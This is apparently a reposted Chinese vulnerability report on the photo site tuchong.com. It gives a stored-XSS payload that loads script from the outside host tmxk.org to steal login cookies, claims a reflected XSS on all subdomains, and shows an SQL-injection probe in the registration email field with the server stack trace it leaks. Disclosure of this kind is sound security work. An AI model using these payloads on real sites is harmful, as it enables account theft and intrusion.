危害大吧, cookies只要拿到了 账号+MD5密码就到手了,然后...... 详细说明:http://tuchong.com/settings/ 注册了在这里配置: 在标签处插入: a><script/src=//tmxk.org>;<!--<a 保存. 个人主页触发了 哦\(^o^)/~ http://tuchong.com/272288/ 这...... 自己测试了下盗取cookie危害大- - 还有个通杀的反射型xss: tochong.com所以子站xxxxx.tuchong.com/?view=list 都有Xss 漏洞 其他的反射型Xss就一堆了希望tuchong能修复,该转义 该编码 该过滤... Zend配置也没配置好,爆路径的也很多.. 谷歌下site:tuchong.com php 或者随便举个列子 www.2cto.com 注册: <input type="text" required="" id="regEmail" name="user_email"> user_email我改成[0x7c or '1'='1'#] {"result":"ERROR","message":"SQLSTATE[HY093]: Invalid parameter number: no parameters were bound","code":"HY093","trace":[{"file":"\/srv\/http\/tuchong\/library\/Jezo\/Db\/Adapter.php","line":945,"function":"execute","class":"PDOStatement","type":"->","args":[[]]},{"file":"\/srv\/http\/tuchong\/library\/Jezo\/Db\/TableSelect.php","line":155,"function":"query","class":"Jezo_Db_Adapter","type":"->","args":[{}]},{"file":"\/srv\/http\/tuchong\/application\/api\/controllers\/AccountController.php","line":297,"function":"fetchRow","class":"Jezo_Db_TableSelect","type":"->","args":[]},{"file":"\/srv\/http\/tuchong\/library\/Zend\/Controller\/Action.php","line":513,"function":"registerAction","class":"AccountController","type":"->","args":[]},{"file":"\/srv\/http\/tuchong\/library\/Zend\/Controller\/Dispatcher\/Standard.php","line":295,"function":"dispatch","class":"Zend_Controller_Action","type":"->","args":["registerAction"]},{"file":"\/srv\/http\/tuchong\/library\/Zend\/Controller\/Front.php","line":954,"function":"dispatch","class":"Zend_Controller_Dispatcher_Standard","type":"->","args":[{},{"headersSentThrowsException":true}]},{"file":"\/srv\/http\/tuchong\/library\/Zend\/Application\/Bootstrap\/Bootstrap.php","line":97,"function":"dispatch","class":"Zend_Controller_Front","type":"->","args":[]},{"file":"\/srv\/http\/tuchong\/library\/Zend\/Application.php","line":366,"function":"run","class":"Zend_Application_Bootstrap_Bootstrap","type":"->","args":[]},{"file":"\/srv\/http\/tuchong\/public\/api.php","line":38,"function":"run","class":"Zend_Application","type":"->","args":[]}]} 其他的- -||不说了..... 修复方案: 该转义 该编码 该过滤... zend配置好. 作者 _Evil
查看更多关于图虫网存储xss 可获取cookies - 网站安全 - 自学ph的详细内容...